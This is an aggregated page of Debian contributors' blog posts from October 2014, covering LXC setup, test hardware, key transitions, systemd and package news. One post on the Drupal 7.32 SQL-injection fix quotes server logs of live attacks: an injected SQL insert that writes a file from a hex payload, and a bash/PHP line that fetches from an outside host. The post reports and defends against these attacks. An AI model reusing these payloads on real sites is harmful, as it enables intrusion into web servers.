October 20, 2014

Francois Marier

LXC setup on Debian jessie

Here's how to set up LXC-based "chroots" on Debian jessie. While this is documented on the Debian wiki, I had to tweak a few things to get the networking to work on my machine.

Start by installing (as root) the necessary packages:

apt-get install lxc libvirt-bin debootstrap

Network setup

I decided to use the default /etc/lxc/default.conf configuration (no change needed here):

lxc.network.type = veth
lxc.network.flags = up
lxc.network.link = virbr0
lxc.network.hwaddr = 00:FF:AA:xx:xx:xx
lxc.network.ipv4 = 0.0.0.0/24

but I had to make sure that the "guests" could connect to the outside world through the "host":

  1. Enable IPv4 forwarding by putting this in /etc/sysctl.conf:

    net.ipv4.ip_forward=1
    
  2. and then applying it using:

    sysctl -p
    
  3. Ensure that the network bridge is automatically started on boot:

    virsh -c lxc:/// net-start default
    virsh -c lxc:/// net-autostart default
    
  4. and that it's not blocked by the host firewall, by putting this in /etc/network/iptables.up.rules:

    -A INPUT -d 224.0.0.251 -s 192.168.122.1 -j ACCEPT
    -A INPUT -d 192.168.122.255 -s 192.168.122.1 -j ACCEPT
    -A INPUT -d 192.168.122.1 -s 192.168.122.0/24 -j ACCEPT
    
  5. and applying the rules using:

    iptables-apply
    

Creating a container

Creating a new container (in /var/lib/lxc/) is simple:

sudo MIRROR=http://ftp.nz.debian.org/debian lxc-create -n sid64 -t debian -- -r sid -a amd64

You can start or stop it like this:

sudo lxc-start -n sid64 -d
sudo lxc-stop -n sid64
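
If the container is already running, you can also get a root shell in it directly, without ssh or the console, using lxc-attach (assuming a reasonably recent kernel, 3.8 or newer):

sudo lxc-attach -n sid64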

Connecting to a guest using ssh

The ssh server is configured to require pubkey-based authentication for root logins, so you'll need to log into the console first. Stop the container and start it again without -d, which attaches your terminal to its console:

sudo lxc-stop -n sid64
sudo lxc-start -n sid64

then install a text editor inside the container because the root image doesn't have one by default:

apt-get install vim

then paste your public key in /root/.ssh/authorized_keys.

Then you can exit the console (using Ctrl+a q) and ssh into the container. You can find out what IP address the container received from DHCP by typing this command:

sudo lxc-ls --fancy

Fixing Perl locale errors

If you see a bunch of errors like these when you start your container:

perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
LANGUAGE = (unset),
LC_ALL = (unset),
LANG = "fr_CA.utf8"
    are supported and installed on your system.
perl: warning: Falling back to the standard locale ("C").

then log into the container as root and use:

dpkg-reconfigure locales

to enable the same locales as the ones you have configured in the host.
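
Alternatively, the same can be done non-interactively inside the container; a minimal sketch for the fr_CA example above (adjust to whatever locales your host has configured):

echo "fr_CA.UTF-8 UTF-8" >> /etc/locale.gen
locale-gen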

20 October, 2014 02:00AM

October 19, 2014

Neil Williams

OpenTAC – an automation lab in a box

I’ve previously covered running LAVA on ARM devices, now that the packages are in Debian. I’ve also covered setting up the home lab, including the difficulty in obtaining the PDU, and relying on another machine to provide USB serial converters, with the inherent problem of needing power to keep the same devices assigned to the same ser2net ports.

There have been ideas about how to improve the situation. Conferences are a prime example – setting up a demo involving LAVA means bringing a range of equipment, separate power bricks, separate network switches (with power bricks), a device of some kind to connect up the USB serial converters (and power brick) and then the LAVA server (with SATA drive and power brick) – and that is without the actual devices and their cables and power. Each of those power cables tends to be a metre long; add networking and serial, and it quickly becomes cable spaghetti.

Ideas around this also have application inside larger deployments, so the hardware would need to daisy-chain to provide services to a rack full of test devices.

The objective is a single case providing network, power and serial connectivity to a number of test devices over a single power input and network uplink. Naturally, with a strong free software and open development bias, the unit will be Open Hardware running Debian, albeit with a custom Beaglebone Linux kernel. It’s a Test Automation Controller, so we’re using the name OpenTAC.

Progress

An open hardware ARM device running Debian to automate tests on 4 to 8 devices, initially aimed at LAVA support for Linaro engineers. It provides power distribution, serial console, network and optional GPIO extensions.

The design involves:

  • A Beaglebone Black (revC)
    • USB hotplug support required, certainly during development.
  • Custom PCB connected as a Beaglebone Cape, designed by Andy Simpkins.
  • Base board provides 4 channels:
    • 5V Power – delivered over USB
    • Ethernet – standard Cat5, no LEDs
    • Serial connectivity
      • RS232
      • UART
    • GPIO
  • Internal gigabit network switch
  • Space for a board like a CubieTruck (with SATA drive) to act as LAVA server
  • Daughter board:
    • Same basic design as the base board, providing another 4 channels, equivalent to the base channels. When the daughter board is fitted, a second network switch would be added instead of the CubieTruck.
  • Power consumption measurement per channel
    • queries made via the Beaglebone Black over arbitrary time periods, including during the test itself.
  • The GPIO lines can be used to work around issues with development boards under test, including closing connections which may be required to get a device to reboot automatically, without manual intervention.
  • Serial connections to test devices can be isolated during device power-cycles – this allows for devices which pull power over the serial connection. (These are typically hardware design issues but the devices still need to be tested until the boards can be modified or replaced.)
  • Thermal control, individual fan control via the Beaglebone Black.
  • 1U case – rackable or used alone on the desk of developers.
  • Software design:
    • lavapdu backend module for PDU control (opentac.py) & opentac daemon on the BBB
      • telnet opentac-01 3225
    • ser2net for serial console control
      • telnet opentac-01 4000

The initial schematics are now complete and undergoing design review. A lot of work remains …

19 October, 2014 10:34PM by Neil Williams

Dirk Eddelbuettel

littler 0.2.1

A new maintenance release of littler is available now.

The main changes are a few updates and extensions to the examples provided along with littler. Several of those continue to make use of the wonderful docopt package by Edwin de Jonge. Carl Boettiger and I are making good use of these littler examples, particularly to install packages directly from CRAN or GitHub, in our Rocker builds of R for Docker (about which we should have a bit more to blog soon, too).

Full details for the littler release are provided as usual at the ChangeLog page.

The code is available via the GitHub repo, from tarballs off my littler page and the local directory here. A fresh package has gone to the incoming queue at Debian; Michael Rutter will probably have new Ubuntu binaries at CRAN in a few days too.

Comments and suggestions are welcome via the mailing list or issue tracker at the GitHub repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

19 October, 2014 09:09PM

Thorsten Alteholz

Key transition, move to stronger key

Finally I was able to do the enormous paperwork (no, it is not that much) to switch my old 1024D key to a new 4096R one. I was a bit afraid that something bad might happen, but my fear was without any reason. After the RT bug was closed, I could upload and send signed emails to mailing lists. So thanks a lot to everyone involved.

old key, 0xD362B62A54B99890

pub   1024D/54B99890 2008-07-23
      Key fingerprint = 36E2 EDDE C21F EC8F 77B8  7436 D362 B62A 54B9 9890
uid                  Thorsten Alteholz (...)
sub   4096g/622D94A8 2008-07-23


new key, 0xA459EC6715B0705F

pub   4096R/0xA459EC6715B0705F 2014-02-03
  Key fingerprint = C74F 6AC9 E933 B306 7F52  F33F A459 EC67 15B0 705F
uid                 [ultimate] Thorsten Alteholz (...)
sub   4096R/0xAE861AE7F39DF730 2014-02-03
  Key fingerprint = B8E7 6074 5FF4 C707 1C77  870C AE86 1AE7 F39D F730
sub   4096R/0x96FCAC0D387B5847 2014-02-03
  Key fingerprint = 6201 FBFF DBBD E078 22EA  BB96 96FC AC0D 387B 5847

19 October, 2014 08:44PM by alteholz

Benjamin Mako Hill

Another Round of Community Data Science Workshops in Seattle

Pictures from the CDSW sessions in Spring 2014

I am helping coordinate three and a half day-long workshops in November for anyone interested in learning how to use programming and data science tools to ask and answer questions about online communities like Wikipedia, free and open source software, Twitter, civic media, etc. This will be a new and improved version of the workshops run successfully earlier this year.

The workshops are for people with no previous programming experience and will be free of charge and open to anyone.

Our goal is that, after the three workshops, participants will be able to use data to produce numbers, hypothesis tests, tables, and graphical visualizations to answer questions like:

  • Are new contributors to an article in Wikipedia sticking around longer or contributing more than people who joined last year?
  • Who are the most active or influential users of a particular Twitter hashtag?
  • Are people who participated in a Wikipedia outreach event staying involved? How do they compare to people that joined the project outside of the event?

If you are interested in participating, fill out our registration form here before October 30th. We were heavily oversubscribed last time so registering may help.

If you already know how to program in Python, it would be really awesome if you would volunteer as a mentor! Being a mentor will involve working with participants and talking them through the challenges they encounter in programming. No special preparation is required. If you’re interested, send me an email.

19 October, 2014 01:19AM by Benjamin Mako Hill

October 18, 2014

Steve Kemp

On the names we use in email

Yesterday I received a small rush of SPAM mails, all of which were 419 scams, and all of them sent by "Mrs Elizabeth PETERSEN".

It struck me that I can't think of ever receiving a legitimate mail from a "Mrs XXX [YYY]", but I was too busy to check.

Today I've done so. Of the 38,553 emails I've received during the month of October 2014 I've got a hell of a lot of mails with a From address including a "Mrs" prefix:

"Mrs.Clanzo Amaki" <marilobouabre14@yahoo.co.jp>
"Mrs Sarah Mamadou"<investment@payment.com>
"Mrs Abia Abrahim" <missfatimajinnah@yahoo.co.jp>
"Mrs. Josie Wilson" <linn3_2008@yahoo.co.jp>
"Mrs. Theresa Luis"<tomaslima@jorgelima.com>

There are thousands more. Not a single one of them was legitimate.

I have one false-positive when repeating the search for a Mr-prefix. I have one friend who has set his sender-address to "Mr Bob Smith", which always reads weirdly to me, but every single other email with a Mr-prefix was SPAM.
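
For the curious, this sort of search needs nothing fancy; a sketch, assuming a Maildir-style store (adjust the path and pattern to your own mail setup):

grep -r "^From:.*Mrs" ~/Maildir/ | wc -l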

I'm not going to use this in any way, since I'm happy with my mail-filtering setup, but it was an interesting observation.

Names are funny. My wife changed her surname post-marriage, but that was done largely on the basis that introducing herself as "Doctor Kemp" was simpler than "Doctor Foreign-Name"; she'd certainly never introduce herself as Mrs Kemp.

Trivia: In Finnish the word for "Man" and "Husband" is the same (mies), but the word for "Woman" (nainen) is different than the word for "Wife" (vaimo).

18 October, 2014 11:03PM

Erich Schubert

Beware of trolls - do not feed

A particularly annoying troll has been on his hate crusade against systemd for months now.
Unfortunately, he's particularly active on Debian mailing lists (but apparently also on Ubuntu and Linux kernel mailing lists) and uses tons of fake user accounts he keeps setting up. Our listmasters have a hard time blocking all his hate, sorry.
Obviously, this is also the same troll that has been attacking Lennart Poettering.
There is evidence that this troll used to go by the name "MikeeUSA", and has had quite a reputation for anti-feminist hate for over 10 years now.
Please, do not feed this troll.
Here are some names he uses on YouTube: Gregory Smith, Matthew Bradshaw, Steve Stone.
Blacklisting is the best measure we have, unfortunately.
Even if you don't like the road systemd is taking, or Lennart Poettering personally - the behaviour of that troll is unacceptable to say the least, and indicates some major psychological problems... also, I wouldn't be surprised if he is involved in #GamerGate, too.
See this example (LKML) if you have any doubts. We seriously must not tolerate such poisonous people.
If you don't like systemd, the acceptable way of fighting it is to write good alternative software (and you should be able to continue using SysV init or OpenRC in Debian, unless there is a bug - in which case, provide a bug fix). End of story.

18 October, 2014 05:41PM

Rhonda D'Vine

Trans Gender Moves

Yesterday I managed to get the last ticket from the waiting list for the premiere of Trans Gender Moves. It is a play about the lives of three people: a trans man, a trans woman and an intersex person. They tell stories from their lives, about their process of finding their own identity over time. With anecdotes that are in part amusing and in part thought-provoking, I can wholeheartedly encourage you to watch it if you have the chance. It will still be shown over the next few days, potentially longer depending on the demand for tickets, from what I've been told by one of the actors.

The funniest moment for me, though, was when I was talking with one of the actors about how it really touched me to learn that one of them will be moving into the same building I will be moving into in two years' time. Unfortunately that will be delayed a bit, because they found what I think are field hamsters or the like in the ground, and have to wait until spring for them to move. :/

18 October, 2014 10:14AM by Rhonda

October 17, 2014

Martin Pitt

Ramblings from LinuxCon/Plumbers 2014

I’m on my way home from Düsseldorf where I attended the LinuxCon Europe and Linux Plumbers conferences. I was quite surprised how huge LinuxCon was: there were about 1,500 people there! Certainly many more than last year in New Orleans.

Containers (in both LXC and docker flavors) are the Big Thing everybody talks about and works with these days; there was hardly a presentation where they weren’t mentioned, and (what felt like) half of the presentations were about either how to improve them or how to use these technologies to solve problems. Some people/companies really take LXC to the max and try to do everything in them, including tasks which in the past you would only have considered full VMs for, like untrusted third-party tenants. There was an interesting talk on how to secure networking for containers, and pretty much everyone uses docker or LXC now to deploy workloads and run CI tests. There are projects like “fleet”, which manages systemd jobs across an entire cluster of containers (a distributed task scheduler), or project-builder.org, which auto-builds packages from each commit of a project.

Another common topic is the trend towards building/shipping complete (r/o) system images, atomic updates and all that goodness. The central thing here was certainly “Stateless systems, factory reset, and golden images”, which analyzed the common requirements and proposed how to implement this with various package systems and scenarios. In my opinion this is certainly the way to go, as our current solution on Ubuntu Touch (i. e. Ubuntu’s system-image) is still far too limited and static; it doesn’t extend to desktops/servers/cloud workloads at all. It’s also a lot of work to implement this properly, so it’s certainly understandable that we took that shortcut for prototyping and the relatively limited Touch phone environment.

At Plumbers my main occupations were the highly interesting LXC track, to see what’s coming in the container world, and the systemd hackfest. At the latter I was again mostly listening (after all, I’m still learning most of the internals there…) and was able to work on some cleanups and improvements, like getting rid of some of Debian’s patches and properly running the test suite. It was also great to sync up again with David Zeuthen about the future of udisks and some particular proposed new features. Looks like I’m the de-facto maintainer now, so I’ll need to spend some time soon to review, include and clean up some much-requested little features and fixes.

All in all a great week to meet some fellows of the FOSS world again, getting to know a lot of new interesting people and projects, and re-learning to drink beer in the evening (I hardly drink any at home :-P).

If you are interested you can also see my raw notes, but beware that they are mostly just scribblings.

Now, off to next week’s Canonical meeting in Washington, DC!

17 October, 2014 04:54PM by pitti

Gunnar Wolf

#Drupal7 sites under attack — Don't panic!

Two days ago, Drupal announced that version 7.32 was available. This version fixes a particularly nasty bug allowing SQL injection at any stage of interaction (that is, even before authentication takes place).

As soon as I could, I prepared and uploaded Debian packages for this — so if you run a Debian-provided Drupal installation, update now. The updated versions are:

sid / jessie (unstable / testing): 7.32-1
wheezy (stable): 7.14-2+deb7u7
wheezy-backports: 7.32-1~bpo70+1
squeeze-backports (oldstable): 7.14-2+deb7u7~bpo60+1
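
If you run the packaged version, the update itself is the usual routine; a sketch for a wheezy system (the same applies to the other suites):

apt-get update
apt-get install --only-upgrade drupal7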

And, as expected, I'm already getting several attacks on my sites. One thing will help you anyway: it won't prevent the attack from happening, but if you use suhosin, several of the attacks will be stopped before they reach Drupal. Yes, sadly suhosin has not been in a stable Debian release since Wheezy, but still... :-|

Partial logs: this looks like shellcode being injected as a file created via the menu_router mechanism (shellcode snipped):

Oct 16 15:22:21 lafa suhosin[3723]: ALERT - configured request variable
total name length limit exceeded - dropped variable 'name[0; INSERT INTO
`menu_router` (`path`, `load_functions`, `to_arg_functions`, `description`,
`access_callback`, `access_arguments`) VALUES ('deheky', '', '', 'deheky',
'file_put_contents',
+0x613a323a7b693a303b733a32323a226d6f64756c65732f64626c6f672f746e777(...)
);;# ]' (attacker '62.76.191.119', file '/usr/share/drupal7/index.php')

While the previous one is clearly targeting this particular bug, I'm not sure about this next one: it is just checking for injection viability before telling me its real intentions:

Oct 17 10:26:04 lafa suhosin[3644]: ALERT - configured request variable
name length limit exceeded - dropped variable
'/bin/bash_-c_"php_-r_\"file_get_contents(
'http://hello_hacked_jp/hello/?l'
(attacker '77.79.40.195', file '/usr/share/drupal7/index.php')

So... looking at my logs from the last two days, Suhosin has not let any such attack reach Drupal (or I have been h4x0red and the logs have all been cleaned — Cannot dismiss that possibility :-) )

Anyway... We shall see many such attempts in the next weeks :-|

[update] Yes, I'm not the only one reporting this attack in the wild. Zion Security explains the same attempt I logged: It attempts to inject PHP code so it can be easily executed remotely (and game over for the admin!)

For the more curious, Tamer Zoubi explains the nature and exploitation of this bug.

17 October, 2014 04:24PM by gwolf

Erich Schubert

Google Earth on Linux

Google Earth for Linux appears to be largely abandoned by Google, unfortunately. The packages available for download cannot be installed on a modern amd64 Debian or Ubuntu system due to dependency issues.
In fact, the amd64 version is a 32 bit build, too. The packages are really low quality: the dependencies are outdated, locale support is busted, etc.
So here are hacky instructions how to install nevertheless. But beware, these instructions are a really bad hack.
  1. These instructions are appropriate for version 7.1.2.2041-r0. Do not use them for any other version. Things will have changed.
  2. Make sure your system has the i386 architecture enabled. Follow the instructions in the section "Configuring architectures" on the Debian MultiArch Wiki page to do so (see the command sketch after this list).
  3. Install lsb-core, and try to install the i386 versions of these packages, too!
  4. Download the i386 version of the Google Earth package
  5. Install the package by forcing dependencies, via
    sudo dpkg --force-depends -i google-earth-stable_current_i386.deb
    
  6. As of now, your package manager will complain and suggest removing the package again. To make it happy, we have to hack the installed packages list. This is ugly, and you should make a backup - you can totally bust your system this way... Fortunately, the change we're doing is rather simple. As admin, edit the file /var/lib/dpkg/status. Locate the section Package: google-earth-stable. In this section, delete the line starting with Depends:. Don't add extra newlines or change anything else!
  7. Now the package manager should believe the dependencies of Google Earth are fulfilled, and no longer suggest removal. But essentially this means you have to take care of them yourself!
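
For reference, steps 2 to 5 roughly correspond to the following command sequence (a sketch only, assuming the 7.1.2.2041-r0 package has already been downloaded to the current directory; step 6 still has to be done by hand):

sudo dpkg --add-architecture i386    # step 2: enable i386 as a foreign architecture
sudo apt-get update
sudo apt-get install lsb-core        # step 3; i386 counterparts may be needed as well
sudo dpkg --force-depends -i google-earth-stable_current_i386.deb    # step 5
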
Some notes on using Google Earth:
  • Locales are busted. Use LC_NUMERIC=en_US.UTF-8 google-earth to start it. Otherwise, it will fail parsing coordinates, if you are in a locale that uses a different number format.
  • You may need to install the i386 versions of some libraries, in particular of your OpenGL drivers! I cannot provide you with a complete list.
  • Search doesn't work sometimes for me.
  • Occasionally, it reports "unknown" network errors.
  • If you upgrade Nvidia graphics drivers, you will usually have to reboot, or you will see graphics errors.
  • Some people have removed/replaced the bundled libQt* and libfreeimage* libraries, but that did not work for me.

17 October, 2014 02:59PM

Tanguy Ortolo

Trying systemd [ OK ] Switching back to SysV [ OK ]

Since systemd is now the default init system under Debian Jessie, it got installed to my system and I had a chance to test it. The result is disappointing: it does not work well with cryptsetup, so I am switching back to SysV init and RC.

The problem comes from the fact that I am using encrypted drives with cryptsetup, and while this is correctly integrated with SysV, it just sucks with systemd, where the passphrase prompt is mixed up with service start messages, a bit like this (from memory, since I did not take a picture of my system booting):

Enter passphrase for volume foobar-crypt:
[ OK ] Sta*rting serv*ice foo**
[ OK ] ***Starting service bar**
[ OK ] Starting service baz****

The stars correspond to the letters I type, and as you can see, since the passphrase prompt does not wait for my input, they end up all over the boot messages, and there is no clear indication that the passphrase was accepted. This looks like some pathological optimization for boot speed, where even interactive steps are run in parallel with service startup: sorry, but this is just insane.

There may exist ways to work around this issue, but I do not care: SysV init works just fine with no setup at all, and since I have no real need for another init system, systemd as a replacement is only acceptable if it works at least as well for my setup, which is not the case. Goodbye systemd, come back when you are ready.

17 October, 2014 02:12PM by Tanguy

Lucas Nussbaum

Debian Package of the Day revival (quite)

TL;DR: static version of http://debaday.debian.net/, as it was when it was shut down in 2009, available!

A long time ago, between 2006 and 2009, there was a blog called Debian Package of the Day. About once per week, it featured an article about one of the gems available in the Debian archive: one of those many great packages that you had never heard about.

At some point in November 2009, after 181 articles, the blog was hacked and never brought up again. Last week I retrieved the old database, generated a static version, and put it online with the help of DSA. It is now available again at http://debaday.debian.net/. Some of the articles are clearly outdated, but many of them are about packages that are still available in Debian, and still very relevant today.

17 October, 2014 01:05PM by lucas

Rhonda D'Vine

New Irssi

After a long time, a new irssi upstream release hit the archive. While the most notable change in 0.8.16 was DNSSEC DANE support, which is enabled (on Linux only; src:dnsval has issues compiling on kFreeBSD), the most visible change in 0.8.17 is the addition of support for both 256 colors and truecolor. The former can be used directly; for the latter you have to explicitly switch the setting colors_ansi_24bit to on. A terminal that supports it is needed, though. To test the 256 color support, your terminal has to support it, your TERM environment variable has to be properly set, and you can then test it with the newly added /cubes alias. If you have an existing configuration, look at the Testing new Irssi wiki page, which helps you get that alias, amongst other useful tips.
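
In irssi terms, enabling truecolor then boils down to (assuming 0.8.17 and a terminal with 24-bit color support):

/set colors_ansi_24bit on
/save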

The package currently only lives in unstable, but once it flows over to testing I will update it in wheezy-backports, too.

Enjoy!

17 October, 2014 12:39PM by Rhonda

Petter Reinholdtsen

Debian Jessie, PXE and automatic firmware installation

When PXE installing laptops with Debian, I often run into the problem that the WiFi card requires some firmware to work properly. And it has been a pain to fix this using preseeding in Debian; normally something more is needed. But thanks to my isenkram package and its recent tasksel extension, it has now become easy to do this using simple preseeding.

The isenkram-cli package provides tasksel tasks which will install firmware for the hardware found in the machine (or more precisely, firmware requested by the kernel modules for the hardware). (It can also install user space programs supporting the detected hardware, but that is not the focus of this story.)

To get this working in the default installation, two preseeding values are needed. First, the isenkram-cli package must be installed into the target chroot (aka the hard drive) before tasksel is executed in the pkgsel step of the debian-installer system. This is done by preseeding the base-installer/includes debconf value to include the isenkram-cli package. The package name is then passed to debootstrap for installation. With the isenkram-cli package in place, tasksel will automatically use the isenkram tasks to detect hardware specific packages for the machine being installed and install them, because isenkram-cli contains tasksel tasks.

Second, one needs to enable the non-free APT repository, because most firmware is unfortunately non-free. This is done by preseeding the apt-mirror-setup step. This is a pity, but for a lot of hardware it is the only option in Debian.

The end result is two lines needed in your preseeding file to get firmware installed automatically by the installer:

base-installer base-installer/includes string isenkram-cli
apt-mirror-setup apt-setup/non-free boolean true
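
For completeness, a PXE setup would typically hand such a preseed file to the installer via the kernel command line, along these lines (a sketch; the URL and label are hypothetical examples):

# pxelinux.cfg fragment
label jessie-auto
  kernel debian-installer/amd64/linux
  append initrd=debian-installer/amd64/initrd.gz auto=true priority=critical preseed/url=http://192.0.2.1/preseed.cfg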

The current version of isenkram-cli in testing/jessie will install both firmware and user space packages when using this method. It also does not work well, so use version 0.15 or later. Installing both firmware and user space packages might give you a bit more than you want, so I decided to split the tasksel task in two: one for firmware and one for user space programs. The firmware task is enabled by default, while the one for user space programs is not. This split is implemented in the package currently in unstable.

If you decide to give this a go, please let me know (via email) how this recipe works for you. :)

So, I bet you are wondering how this can work. First and foremost, it works because tasksel is modular and driven by whatever files it finds in /usr/lib/tasksel/ and /usr/share/tasksel/. So the isenkram-cli package places two files for tasksel to find. First there is the task description file (/usr/share/tasksel/descs/isenkram.desc):

Task: isenkram-packages
Section: hardware
Description: Hardware specific packages (autodetected by isenkram)
 Based on the detected hardware various hardware specific packages are
 proposed.
Test-new-install: show show
Relevance: 8
Packages: for-current-hardware

Task: isenkram-firmware
Section: hardware
Description: Hardware specific firmware packages (autodetected by isenkram)
 Based on the detected hardware various hardware specific firmware
 packages are proposed.
Test-new-install: mark show
Relevance: 8
Packages: for-current-hardware-firmware

The key parts are Test-new-install, which indicates how the task should be handled, and the Packages line referencing a script in /usr/lib/tasksel/packages/. The scripts use other scripts to get a list of packages to install. The for-current-hardware-firmware script looks like this, listing the relevant firmware for the machine:

#!/bin/sh
#
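# List the hardware specific firmware packages relevant for this
# machine, as detected by isenkram.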
PATH=/usr/sbin:$PATH
export PATH
isenkram-autoinstall-firmware -l

With those two pieces in place, the firmware is installed by tasksel during the normal d-i run. :)

If you want to test what tasksel will install when isenkram-cli is installed, run DEBIAN_PRIORITY=critical tasksel --test --new-install to get the list of packages that tasksel would install.

Debian Edu will pilot this feature, as isenkram is used there now to install firmware, replacing the earlier scripts.

17 October, 2014 12:10PM

October 16, 2014

Bits from Debian

Help empower the Debian Outreach Program for Women

Debian is thrilled to participate in the 9th round of the GNOME FOSS Outreach Program. While OPW is similar to Google Summer of Code, it has a winter session in addition to a summer session, and it is open to non-students.

Back at DebConf 14 several of us decided to volunteer because we want to increase diversity in Debian. Shortly thereafter the DPL announced Debian's participation in OPW 2014.

We have reached out to several corporate sponsors and are thrilled that so far Intel has agreed to fund an intern slot (in addition to the slot offered by the DPL)! While that makes two funded slots we have a third sponsor that has offered a challenge match: for each dollar donated by an individual to Debian the sponsor will donate another dollar for Debian OPW.

This is where we need your help! If we can raise $3,125 by October 22 that means we can mentor a third intern ($6,250). Please spread the word and donate today if you can at: http://debian.ch/opw2014/

If you'd like to participate as an intern, the application deadline is the same (October 22nd). You can find out more on the Debian Wiki.

16 October, 2014 05:30PM by Tom Marble

October 15, 2014

Raphaël Hertzog

Freexian’s second report about Debian Long Term Support

Like last month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In September 2014, 3 contributors have been paid for 11h each. Here are their individual reports:

Evolution of the situation

Compared to last month, we have gained 5 new sponsors, which is great. We’re now at almost 25% of a full-time position. But we’re not done yet: we believe that we would need at least twice as many sponsored hours to do a reasonable job on at least the most used packages, and possibly four times as many to cover the full archive.

We’re now at 39 packages that need an update in Squeeze (+9 compared to last month), and the contributors paid by Freexian handled 11 of them last month (this gives an approximate rate of 3 hours per update, CVE triage included).

Open questions

Dear readers, what can we do to convince more companies to join the effort?

The list of sponsors contains almost exclusively companies from Europe. It’s true that Freexian’s offer is in Euros, but the economy is world-wide and international invoices are common. When Ivan Kohler asked whether having an offer in dollars would help convince other companies, we got zero feedback.

What are the main obstacles that you face when you try to convince your managers to get the company to contribute?

By the way, we prefer that companies make small sponsorship commitments that they can sustain over multiple years, rather than granting lots of money now and then not being able to afford it the following year.

Thanks to our sponsors

Let me thank our main sponsors:

15 October, 2014 07:45AM by Raphaël Hertzog

Matthew Palmer

My entry in the "Least Used Software EVAH" competition

For some reason, I seem to end up writing software for very esoteric use-cases. Today, though, I think I’ve outdone myself: I sat down and wrote a Ruby library to get and set process resource limits – those things that nobody ever thinks about except when they run out of file descriptors.

I didn’t even have a direct need for it. Recently I was grovelling through the EventMachine codebase, looking at the filehandle limit code, and noticed that the pure-ruby implementation didn’t manipulate filehandle limits. I considered adding it, then realised that there wasn’t a library available to do it. Since I haven’t berked around with FFI for a while, I decided to write rlimit. Now to find the time to write that patch for EventMachine…

Since I doubt there are many people who have a burning need to manipulate rlimits in Ruby, this gem will no doubt sit quiet and undisturbed in the dark, dusty corners of rubygems.org. However, for the three people on earth who find this useful: you’re welcome.

15 October, 2014 05:00AM by Matt Palmer (mpalmer@hezmatt.org)

October 14, 2014

Julian Andres Klode

Key transition

I started transitioning from 1024D to 4096R. The new key is available at:

https://people.debian.org/~jak/pubkey.gpg

and the keys.gnupg.net key server. A very short transition statement is available at:

https://people.debian.org/~jak/transition-statement.txt

and included below (the http version might get extended over time if needed).

The key consists of one master key and 3 sub keys (signing, encryption, authentication). The sub keys are stored on an OpenPGP v2 Smartcard. That’s really cool, isn’t it?

Somehow it seems that GnuPG 1.4.18 also works with 4096R keys on this smartcard (I accidentally used it instead of gpg2 and it worked fine), although only GPG 2.0.13 and newer is supposed to work.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1,SHA512

Because 1024D keys are not deemed secure enough anymore, I switched to
a 4096R one.

The old key will continue to be valid for some time, but i prefer all
future correspondence to come to the new one.  I would also like this
new key to be re-integrated into the web of trust.  This message is
signed by both keys to certify the transition.

the old key was:

pub   1024D/00823EC2 2007-04-12
      Key fingerprint = D9D9 754A 4BBA 2E7D 0A0A  C024 AC2A 5FFE 0082 3EC2

And the new key is:

pub   4096R/6B031B00 2014-10-14 [expires: 2017-10-13]
      Key fingerprint = AEE1 C8AA AAF0 B768 4019  C546 021B 361B 6B03 1B00

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iEYEARECAAYFAlQ9j+oACgkQrCpf/gCCPsKskgCgiRn7DoP5RASkaZZjpop9P8aG
zhgAnjHeE8BXvTSkr7hccNb2tZsnqlTaiQIcBAEBCgAGBQJUPY/qAAoJENc8OeVl
gLOGZiMP/1MHubKmA8aGDj8Ow5Uo4lkzp+A89vJqgbm9bjVrfjDHZQIdebYfWrjr
RQzXdbIHnILYnUfYaOHUzMxpBHya3rFu6xbfKesR+jzQf8gxFXoBY7OQVL4Ycyss
4Y++g9m4Lqm+IDyIhhDNY6mtFU9e3CkljI52p/CIqM7eUyBfyRJDRfeh6c40Pfx2
AlNyFe+9JzYG1i3YG96Z8bKiVK5GpvyKWiggo08r3oqGvWyROYY9E4nLM9OJu8EL
GuSNDCRJOhfnegWqKq+BRZUXA2wbTG0f8AxAuetdo6MKmVmHGcHxpIGFHqxO1QhV
VM7VpMj+bxcevJ50BO5kylRrptlUugTaJ6il/o5sfgy1FdXGlgWCsIwmja2Z/fQr
ycnqrtMVVYfln9IwDODItHx3hSwRoHnUxLWq8yY8gyx+//geZ0BROonXVy1YEo9a
PDplOF1HKlaFAHv+Zq8wDWT8Lt1H2EecRFN+hov3+lU74ylnogZLS+bA7tqrjig0
bZfCo7i9Z7ag4GvLWY5PvN4fbws/5Yz9L8I4CnrqCUtzJg4vyA44Kpo8iuQsIrhz
CKDnsoehxS95YjiJcbL0Y63Ed4mkSaibUKfoYObv/k61XmBCNkmNAAuRwzV7d5q2
/w3bSTB0O7FHcCxFDnn+tiLwgiTEQDYAP9nN97uibSUCbf98wl3/
=VRZJ
-----END PGP SIGNATURE-----

14 October, 2014 09:46PM by Julian Andres Klode

Joachim Breitner

Switching to systemd-networkd

Ever since I read that systemd-networkd was in the making, I was looking forward to trying it out. I kept watching for the package to appear in Debian, or at least for ITP bugs. A few days ago, by accident, I noticed that I already have systemd-networkd on my machine: it is simply shipped with the systemd package!

My previous setup was a combination of ifplugd, to detect when I plug or unplug the ethernet cable, with a plain DHCP entry in /etc/network/interfaces. A while ago I was using guessnet to do a static setup depending on where I am, but I don’t need this flexibility any more, so the very simple approach with systemd-networkd is just fine with me. So after stopping ifplugd and

$ cat > /etc/systemd/network/eth.network <<__END__
[Match]
Name=eth0
[Network]
DHCP=yes
__END__
$ systemctl enable systemd-networkd
$ systemctl start systemd-networkd

I was ready to go. Indeed, systemd-networkd, probably due to the integrated dhcp client, felt quite a bit faster than the old setup. And what’s more important (and my main motivation for the switch): It did the right thing when I put it to sleep in my office, unplug it there, go home, plug it in and wake it up. ifplugd failed to detect this change and I often had to manually run ifdown eth0 && ifup eth0; this now works.

But then I was bitten by what I guess some people call the viral nature of systemd: systemd-networkd would not update /etc/resolv.conf, but rather relies on systemd-resolved. And that requires me to change /etc/resolv.conf to be a symlink to /run/systemd/resolve/resolv.conf. But of course I also use my wireless adapter, which, at that point, was still managed using ifupdown, which would use dhclient, which updates /etc/resolv.conf directly.

So I investigated if I can use systemd-networkd also for my wireless account. I am not using NetworkManager or the like, but rather keep wpa_supplicant running in roaming mode, controlled from ifupdown (not sure how that exactly works and what controls what, but it worked). I found out that this setup works just fine with systemd-networkd: I start wpa_supplicant with this service file (which I found in the wpasupplicant repo, but not yet in the Debian package):

[Unit]
Description=WPA supplicant daemon (interface-specific version)
Requires=sys-subsystem-net-devices-%i.device
